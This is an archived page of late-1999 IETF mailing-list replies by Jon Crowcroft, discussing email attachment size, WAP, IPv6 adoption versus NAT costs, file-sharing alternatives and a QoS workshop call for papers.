einstein might have said that matter and energy are interchangeable
but space and time are not
i can buy a 10Gig disk for a lot less than the average per diem pay in
US/EU

there's too MANY emails, not too MUCH of each
j.



Re: WAP

1999-12-15 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Scott Bradner typed:

 WAP is not an IETF activity - it is from the WAP Forum
 http://www.wapforum.org/
 
and nearly as many clues as wires

happy winter solstice

 cheers

   jon



Re: Email messages: How large is too large?

1999-12-15 Thread Jon Crowcroft


In message Pine.SOL.3.96.991215093330.5839F-10@mailer1, Jon Knight typed:

 o Internet driving licences may seem a bit naff, but there
   is value in requiring people to migrate to a power-user
   status by at least trying to teach them that there are
   consequences to using tools in distributed communications
 
 Just to point out that there appears to be something called the European
 Computer Driving License (see URL:http://www.wlv.ac.uk/pers/csdpages/
 ecdl.htm for instance).  I've no idea what sort of Internet training

one minor difference between the internet and roads
is that on roads, most people are ok drivers, whereas on the internet,
you have to follow Postel's rule - assume everyone else is a psycopath
_and_ behave like a philanthropist

there's a special course in +defensive+ driving you can do which is
close - if you've ever tried going above 120mph on 101, you'll know
exasctly what i mean
 provides to end users but I would guess its more the "which button to
 press in IE 5" type of training course.  I'll find out early next year as
 my girlfriend who is a public librarian is going to have to go on the
 course.
 
 User education is a tricky subject.  One of my collegues in the Networks
 Team is currently on the phone explaining to an end user that sending an
 email with a large Word attachment to all 15000 users on campus isn't a
 good idea as our mail servers will melt.  Despite our email training
 courses telling people this, its a regular request, especially from
 non-academic departments who are used to doing paper based mass mailings
 to students.  Funny thing is that depite us offering to put the Word
 document on a web page and then send a small email pointing at it,
 they=A0might well just decide to flood the campus postal mail still (has
 happened before).  Managing this even on a single campus is a headache.
 
 Tatty bye,
 
 Jim'll
 

 cheers

   jon



IP QoS workshops conferences and journals

1999-12-15 Thread Jon Crowcroft


The First International Workshop
Quality of future Internet Services (QofIS'2000)
25- 26 September 2000 in Berlin, Germany 
http://www.fokus.gmd.de/events/qofis2000/

The purpose of this workshop is to present and discuss the design and 
implementation techniques for QoS Engineering for Internet services. This workshop 
explicitly focuses on end to end services over QoS assured Internet, on
the issues of service creation, configuration and deployment. 

Important Deadlines:
29 March 2000: Papers, demonstrations and panel proposals 
29 May 2000: Authors notified of acceptance 
07 July 2000: Camera-ready copies of papers and panelists' position papers due

For all details visit http://www.fokus.gmd.de/events/qofis2000/
-

see also 
IWQoS 2000 at CMU
http://www.cs.cmu.edu/~iwqos/

and sigcomm 2000
http://www.acm.org/sigcomm/sigcomm2000

and
Special Issue of Computer Communications
   on
QoS-Sensitive Network Applications and Systems

and
JOURNAL OF COMMUNICATIONS AND NETWORKING (JCN)   
CALL FOR PAPERS - SPECIAL ISSUE ON QoS IN IP NETWORKS
JUNE, 2000





Re: Email messages: How large is too large?

1999-12-14 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Valdis.Kletnieks@vt
.edu typed:

 --==_Exmh_-374731876P
 
 
 a) Do you have an incoming anonymous FTP drop *of your own*?
 b) Are you willing to set up incoming FTP for one file?
 c) What if you're one of the millions of people who use an ISP that
 doesn't provide FTP drops?

plenty of ISPs offer free web space (e.g. 5M is typical) - for a file
of size nMbytes , all you
need is to get n/5 internet accounts , run split on the file - hey you
could use slightly more (e..g n) and
even run a fancy layered fec dithering crypto algorithm
and have a file that noone could _remove_ without removing more than
4n sites - its called an "eternity" service and is a possible very
valuble service indeed (reliable and also hard for centralized
authorities to attack)
 
 OK, that doesn't seem to be viable. Let me store it and you pick it up:
 d) I happen to be lucky enough to have my own workstation.  However,
 you can't FTP to it because I have FTP disabled.  If I don't have an FTP
 drop, you can't pick it up.
 e) If I didn't have a Web page area big enough to hold the file,
 how would I send it to you?  Remember that many freebie sites put a 5M or 10M
 quota on the users...
 
 Of course, the right answer is something like this:
 
 1440 SIFT/UFT: Sender-Initiated/Unsolicited File Transfer. R. Troth.
  July 1993. (Format: TXT=17366 bytes) (Status: EXPERIMENTAL)
 
 However, there's few enough sites running it that it's not really an
 alternative.  Heck, I *know* Rick Troth, and I'm not even running one,
 mostly due to a lack of anybody else for it to talk to.
 
 Perhaps it's time to dust that RFC off and see what can be done with it...
 
 
 -- 
  Valdis Kletnieks
  Operating Systems Analyst
  Virginia Tech
 
 
 
 --==_Exmh_-374731876P
 Content-Type: application/pgp-signature
 
 -BEGIN PGP MESSAGE-
 Version: 2.6.2
 
 iQCVAwUBOFVSLtQBOOoptg9JAQHU/QQAs9Co7vgq6IElSjIlizIJD9i+vA4VjhNS
 cObsuiF0rwXHoYdrTlyJKm0FO4Yrs+J5CpPKGRL3ky6sR7FaD32lhg0PKZBlTC4s
 GkVcNNp8mJoYOIcscf07bRtn0GzyJHtzRxpqaVbK9k0whb5j/Or91CTdnEPU5OAS
 obDidnOhNfA=
 =KdSF
 -END PGP MESSAGE-
 
 --==_Exmh_-374731876P--
 

 cheers

   jon



Re: IP network address assignments/allocations information?

1999-12-03 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Yakov Rekhter typed:

 Consider an alternative where the client decides to use IPv6.  Granted,
 the client could get enough IPv6 addresses for all purposes, regardless of
 whether these purposes essential or not. But then in order for that
 client to communicate with the rest of the folks, the client would
 likely to use NAT (as the rest of the folks would still use IPv4). 

its economics - if one large client uses IPv6, then so will others
eventually as its cheaper for all of them colelctively than for them
to go on using NATs.

 the cost of using NAT wouldn't go away.  But in addition, this alternative
 would cause the client to swallow the cost of transition from IPv4 to IPv6 
 in its infrastructure.

right - the problem is gettng the FIRST person to go - clearly a
PROVIDER could consider swallowing the cost (i.e. pay cisco to
implement, and debug a deployed IPv6 backbone and then chase customer
problems) - why? because in the LONG run there's more subscribers
selling content, doing busienss in a fully IP (v6) connected net
than  on a NAT disconnect, and so there's more money for the
provider

btw, i think the address space stuff for subscribers using NATs is often
(not always) hokum - its
mostly that they can't be bothered to design a decent addressing
architecture for their intranets.


 

 cheers

   jon



Re: IP network address assignments/allocations information?

1999-12-02 Thread Jon Crowcroft


In message [EMAIL PROTECTED], "J. Noel Chiappa" typed:

 The various approaches to growing the Internet (IPv6, NAT's, etc) all have
 costs and benefits -

yes, but propviders don't actually ASK the users what the COST is of a
NAT

the BT ADSL trial in london uses NATs and all the folks i know who are
what BT might call "advanced" users (i.e. people who want to export
files on web servers, use multicast apps etc), find it a
REAL PAIN in the backside
comapred to their old school/university 'always on' access

but at no point in any of the market research on the trial users did
the provider bother asking about this, so they remain cluelessas
do many NAT Proponents.

 cheers

   jon